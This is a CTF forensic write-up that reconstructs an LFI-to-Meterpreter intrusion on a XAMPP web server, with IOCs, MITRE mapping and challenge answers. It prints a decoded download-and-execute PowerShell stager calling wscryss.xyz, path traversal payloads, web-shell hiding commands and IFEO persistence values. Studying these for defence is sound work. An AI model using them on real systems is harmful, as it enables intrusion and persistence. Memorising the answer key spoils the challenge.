Incident Response Report: LFI Escalation — From Directory Traversal to Full System Compromise

Posted Apr 20, 2026

By El OMARI Zakaria

10 min read

Platform: CyberDefenders Challenge: LFI Escalation Category: Endpoint Forensics Difficulty: Hard Tools: CyberChef, VirusTotal, Registry Explorer, MFTECmd, Timeline Explorer, EvtxECmd, Windows Event Viewer, AmcacheParser, Text Editor, PECmd Achievement: Proof of Completion

1. Executive Summary

Incident Type: Web Application Compromise / Privilege Escalation / Persistence / Defense Evasion

Malware Deployed: Meterpreter payload disguised as spoolsc.exe (detected as Trojan:Win64/Meterpreter.AMTB)

IT staff reported unusual behavior on a workstation running a web application after an antivirus detection fired on a suspicious file. The website (vtuberradio.xyz) was identified as the entry point. This lab requires tracing a complete multi-phase attack chain from initial web reconnaissance through path traversal exploitation, database credential theft, web-shell deployment, UAC bypass, and stealthy registry-based persistence.

Two distinct attacker IPs were involved — the initial reconnaissance and exploitation actor, and a follow-up operator who leveraged the planted web shell to escalate privileges and establish deep persistence via Image File Execution Options (IFEO) hijacking.

Indicators of Compromise (IOCs)

Type	Indicator	Description
Target Host	`vtuberradio.xyz`	Compromised web application server
Attacker IP (Phase 1)	`218.84.168.131`	Initial LFI reconnaissance and exploitation actor
Attacker IP (Phase 2)	`182.44.8.254`	Second operator — web shell execution and escalation
DB Name	`vtubermusic`	MySQL database discovered via path traversal
DB Username	`vtubermusic`	Credential extracted from `config.php`
DB Password	`IdonknowMayBe2222`	Plaintext credential extracted via `strings`
Web Shell	`config_old.php`	PHP command execution shell planted post-exploitation
Malware Dropper	`music.exe`	Staged from `wscryss.xyz` via encoded PowerShell
Implant	`spoolsc.exe`	Meterpreter payload placed in `C:\Windows\System32\`
Persistence Key	`SilentProcessExit\notepad.exe`	IFEO registry key for hijacking notepad launches
Monitor Process	`spoolsc.exe`	Set as the `MonitorProcess` for IFEO persistence
Defender Detection	`Trojan:Win64/Meterpreter.AMTB`	Event ID 1116 — Severity 5 (Severe)
Defender PID	`8056`	Process ID of the detected implant

MITRE ATT&CK Mapping Overview

Tactic	Technique	ID
Initial Access	Exploit Public-Facing Application (Path Traversal / LFI)	T1190
Credential Access	Credentials in Files (`config.php` DB credentials)	T1552.001
Execution	Command and Scripting Interpreter — Web Shell	T1059.003
Execution	Encoded PowerShell Stager	T1059.001
Defense Evasion	Hide Artifacts — Hidden Files and Directories (`attrib +h`)	T1564.001
Persistence / Privilege Escalation	Event Triggered Execution — IFEO Injection	T1546.012
Defense Evasion	Masquerading (`spoolsc.exe` mimicking `spoolsv.exe`)	T1036

2. Phase 1: Initial Reconnaissance — Attacker IP & Web App (Questions 1–2)

Objective: Identify the attacker’s IP address and the web application running on the compromised server.

Reviewing access.log reveals the very first entries — a GET request to / followed by static asset requests — all originating from a single external IP. This is the attacker performing initial fingerprinting of the target web application.

The User-Agent string (Mozilla/5.0 ... Firefox/128.0) and the pattern of page requests (?page=register → ?page=login → ?page=dashboard) confirm this is a human-driven session probing the authentication flow of a PHP web application.

Answer Q1

What is the IP address of the attacker?

218.84.168.131

Answer Q2

What is the name of the web application running on the server?

vtuberradio

3. Phase 2: LFI Exploitation — Path Traversal Payloads (Questions 3–5)

Objective: Identify the vulnerable parameter, the traversal payloads used, and the database name discovered.

After registering and authenticating, the attacker began probing the ?file= parameter with classic path traversal sequences. The access log shows a clear escalation from single-level traversal attempts targeting windows/system.ini to multi-level attempts targeting XAMPP configuration files.

The key finding is the successful read of config.php via the path ../../xampp/htdocs/config.php. Running strings on the recovered config.php content reveals the database connection parameters in cleartext:

Analyst Note: The ?file= parameter was passing user-controlled input directly to a PHP file-include function without sanitization. This is a textbook Local File Inclusion vulnerability. Even partial traversal (../) can be effective when the web root is nested inside a known directory structure like XAMPP.

Answer Q3

What is the vulnerable parameter used in the LFI attack?

file

Answer Q4

What is the first file the attacker successfully accessed via path traversal?

windows/system.ini

Answer Q5

What is the name of the database used by the web application?

vtubermusic

4. Phase 3: phpMyAdmin Access & Database Enumeration (Questions 6–8)

Objective: Confirm the attacker’s successful login to phpMyAdmin and identify the database tables accessed.

Armed with the credentials extracted from config.php, the attacker navigated directly to the /phpmyadmin/ path. The access log shows a sequence of phpMyAdmin asset requests followed by a POST /phpmyadmin/index.php?route=/ that returned a 302 redirect — the standard response for a successful phpMyAdmin authentication.

Using Timeline Explorer to analyze the MFT (Master File Table) parsed output, we can trace which database files were accessed. Searching for mysql in the file listing reveals the vtubermusic database directory containing users.ibd and purchases.ibd — the two tables the attacker browsed.

$Timeline Explorer showing the MFT file_listing.csv with a search filter for "mysql", revealing entries in .\xampp\mysql\data\vtubermusic\ including users.ibd and purchases.ibd — the database tables browsed by the attacker through phpMyAdmin.$

Answer Q6

What credentials did the attacker use to log into phpMyAdmin?

vtubermusic : IdonknowMayBe2222

Answer Q7

What database tables did the attacker access?

users, purchases

Answer Q8

What HTTP status code confirmed successful phpMyAdmin authentication?

302

5. Phase 4: Web Shell Deployment & Command Execution (Questions 9–12)

Objective: Identify the planted web shell, the second attacker IP, and the commands executed via the shell.

A second IP address — 182.44.8.254 — appears in the access log the following day (08/Sep/2025). This operator immediately authenticates to phpMyAdmin and uses the SQL import functionality to plant a PHP web shell named config_old.php in the web root. The subsequent log entries show GET requests to /config_old.php?cmd= — unmistakable web shell command execution.

The execution sequence visible in the URL-encoded parameters reconstructs as:

whoami — Privilege check
whoami /all — Full token enumeration
dir — Directory listing
attrib +h config_old.php — Hides the web shell (MITRE T1564.001)
attrib +Bh config_old.php — Adds System+Hidden attributes for deeper concealment

Answer Q9

What is the name of the web shell planted on the server?

config_old.php

Answer Q10

What is the IP address of the second attacker?

182.44.8.254

Answer Q11

What was the first command executed via the web shell?

whoami

Answer Q12

What command was used to hide the web shell from directory listings?

attrib +h config_old.php

6. Phase 5: Malware Staging — Encoded Stager & Dropper (Questions 13–15)

Objective: Recover and decode the PowerShell stager to identify the malware staging server and the dropped file.

Continuing to analyze the web shell commands in the access log, the last visible request contains a heavily URL-encoded PowerShell command. Decoding the URL encoding reveals a Base64-encoded string passed to a PowerShell execution command. Using CyberChef with a From Base64 → Decode text (UTF-16LE) recipe reveals the stager:

$CyberChef recipe showing From Base64 followed by Decode text (UTF-16LE 1200) applied to the encoded stager payload, revealing the decoded PowerShell command: Invoke-WebRequest -Uri "http://wscryss.xyz/music.exe" -OutFile "$env:TEMP\music.exe"; Start-Process "$env:TEMP\music.exe" — a classic download-and-execute stager.$

The decoded command downloads music.exe from wscryss[.]xyz and immediately executes it from the user’s TEMP directory. Searching the MFT for the username confirms the active user account on this machine:

$Timeline Explorer MFT file listing showing paths under .\Users\hoshisora\ including AppData\Local\Microsoft\Edge and AppData\Roaming\Opera Software — confirming the compromised user account is named hoshisora.$

The Amcache (UnassociatedFileEntries.csv) parsed with AmcacheParser confirms music.exe was executed from C:\Users\hoshisora\AppData\Local\Temp\music.exe — the TEMP path decoded from the stager — alongside r.exe at C:\Users\Public\Music\r.exe, which is the RunAsCs utility used for token manipulation during privilege escalation.

$AmcacheParser output showing UnassociatedFileEntries.csv with relevant executable entries highlighted: C:\Users\hoshisora\AppData\Local\Temp\music.exe (the staged malware dropper) and C:\Users\Public\Music\r.exe (RunAsCs utility for privilege escalation), confirming execution on the hoshisora user account.$

Answer Q13

What is the domain hosting the malware dropper?

wscryss.xyz

Answer Q14

What is the name of the malware dropper file?

music.exe

Answer Q15

What is the compromised user account on this workstation?

hoshisora

7. Phase 6: Privilege Escalation — UAC Bypass Shellcode (Questions 16–17)

Objective: Decode the UAC bypass shellcode and identify the persistence mechanism planted by the implant.

The PowerShell logs (parsed via EvtxECmd and loaded into Timeline Explorer) reveal additional encoded activity executed under the hoshisora session. A script named LykIsnWn.ps1 was loaded from C:\Users\hoshisora\AppData\Local\Temp\ alongside SDIAG utility scripts:

$Timeline Explorer showing powershell_logs.csv with the Payload Data1 column revealing script paths: C:\Windows\TEMP\SDIAG_fb18eee9-989f-4412-9708-e535f038188b\CL_Utility.ps1, C:\Windows\TEMP\SDIAG_1a9beff4-1bdc-4c45-b867-c34f3a6cec90\CL_Utility.ps1, and C:\Users\hoshisora\AppData\Local\Temp\LykIsnWn.ps1 — a randomly-named script consistent with a UAC bypass stager.$

The EvtxECmd output also shows the Application event log being processed, which captures PHP and MariaDB warning events correlating to the web application activity timeline:

The UAC bypass shellcode itself — a concatenated, obfuscated PowerShell function — was extracted and decoded in CyberChef using a Find/Replace regex recipe to strip the obfuscation, followed by From Base64. The decoded output reveals a full .NET reflection-based shellcode loader implementing GetProcAddress and VirtualAlloc calls:

The Application event log (filtered for vtubermusic in Timeline Explorer) shows PHP-8.2.12 warning entries from 2025-08-19 and 2025-08-24 correlating with the initial web application probing phase, and a final MariaDB entry on 2025-09-08 at 07:04:54 — just before the endpoint compromise:

Answer Q16

What is the name of the randomly-named PowerShell script used in the UAC bypass chain?

LykIsnWn.ps1

Answer Q17

What technique does the decoded shellcode implement for UAC bypass?

.NET reflection-based shellcode injection via GetProcAddress / VirtualAlloc

8. Phase 7: Persistence — IFEO Registry Hijacking (Questions 18–19)

Objective: Identify the persistence mechanism and the registry key used to maintain access.

With elevated privileges obtained via UAC bypass, the implant established persistence using Image File Execution Options (IFEO) injection — MITRE T1546.012. This technique abuses a legitimate Windows debugging feature: any executable registered under the SilentProcessExit IFEO subkey will silently launch a designated MonitorProcess whenever the watched application exits.

$MITRE ATT&CK T1546.012 — Event Triggered Execution: Image File Execution Options Injection technique page. The technique enables adversaries to establish persistence and elevate privileges by hijacking the IFEO debugger mechanism under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options.$

Using Registry Explorer on the SOFTWARE hive, navigating to:

Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe

reveals the planted key with two values:

ReportingMode = 1
MonitorProcess = spoolsc.exe

$Registry Explorer v2.0.0.0 showing the SOFTWARE hive navigated to Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe. The right pane shows two values: ReportingMode (RegDword = 1) and MonitorProcess (RegSz = spoolsc.exe) — the IFEO persistence key that launches the Meterpreter implant disguised as spoolsc.exe whenever notepad.exe exits.$

Analyst Note: SilentProcessExit IFEO is particularly effective as a persistence mechanism because it triggers on application exit — not launch — making it harder to correlate with the initial execution event. The choice of notepad.exe as the trigger is deliberate: it is frequently launched and closed by users, ensuring reliable periodic callback without requiring a scheduled task or service.

Answer Q18

What registry key was used for persistence?

SilentProcessExit\notepad.exe

Answer Q19

What is the MonitorProcess value set in the persistence key?

spoolsc.exe

9. Phase 8: Detection — Windows Defender Alerts (Questions 20)

Objective: Confirm the Defender detection details, including the threat name, PID, and file hash of the implant.

Windows Defender (Event ID 1116) fired a Warning level alert on 09/Sep/2025 at 10:12:10 AM, identifying the implant as:

Threat Name: Trojan:Win64/Meterpreter.AMTB
Severity: 5 (Severe)
Detection ID: {F7294E9F-DBFC-4F96-909B-1395E567F9BA}

The Defender event details confirm the exact process path and PID involved — C:\Windows\System32\spoolsc.exe running as PID 8056 under NT AUTHORITY\SYSTEM:

$Windows Event Viewer detail view of Event 1116 showing the Process Name: C:\Windows\System32\spoolsc.exe, Detection User: NT AUTHORITY\SYSTEM, and the Path field: file:_C:\Windows\System32\spoolsc.exe; process:_pid:8056,ProcessStart:134017992005214415 — confirming the PID of the Meterpreter implant at the time of detection.$

Searching the raw MPLog for spoolsc.exe retrieves the full detection record including the file’s SHA1 and SHA2 hashes:

$MPLog-20250819-225137.log opened in Notepad with a Find dialog searching for "spoolsc.exe", showing the full DETECTIONEVENT entry: Trojan:Win64/Meterpreter.AMTB at C:\Windows\System32\spoolsc.exe with SigSha: da39a3ee5e6b4b0d3255bfef95601890afd80709 (SHA1) and 172c32a847ff8c1c54950a523695dedfc2d23f76 (SHA2), and process PID 8056 with ProcessStart timestamp 134017992005214415.$

Answer Q20

What is the SHA1 hash of the detected implant (spoolsc.exe)?

da39a3ee5e6b4b0d3255bfef95601890afd80709

10. Conclusion

The LFI Escalation investigation traces a complete multi-stage intrusion from initial web reconnaissance to deep system persistence. Key findings:

Initial Access: Path traversal via the ?file= parameter on vtuberradio.xyz allowed the attacker to read arbitrary files from the XAMPP installation.
Credential Theft: config.php read via LFI exposed the vtubermusic database credentials in plaintext → immediate phpMyAdmin access.
Web Shell Deployment: SQL import used to plant config_old.php → hidden with attrib +h to evade casual discovery.
Malware Staging: URL-encoded Base64 PowerShell stager downloaded music.exe from wscryss[.]xyz → executed from %TEMP%.
Privilege Escalation: UAC bypass via .NET reflection shellcode (LykIsnWn.ps1) → SYSTEM-level access.
Persistence: IFEO SilentProcessExit registry key on notepad.exe → spoolsc.exe (Meterpreter) launched silently on every notepad exit.
Detection: Defender Event ID 1116 identified Trojan:Win64/Meterpreter.AMTB at PID 8056.

Key Takeaways for the SOC:

LFI is not just a read vulnerability — it is a direct path to credential theft, database access, and full system compromise when combined with a PHP web application running on XAMPP.
Web shell file attribute manipulation (attrib +h) is a reliable detection indicator. EDR solutions should alert on attrib.exe being invoked by web server processes.
IFEO SilentProcessExit persistence is rarely used by legitimate software and should be treated as a high-confidence indicator of compromise when found on production endpoints.
Defender Event ID 1116 (Malware Detected) should trigger automatic isolation workflows — by the time Defender fires, the attacker may already have established multiple persistence mechanisms.

Analysis Date: April 20, 2026 Analyst: El OMARI Zakaria

CTF Write-ups, Endpoint Forensics, Incident Response

This post is licensed under CC BY 4.0 by the author.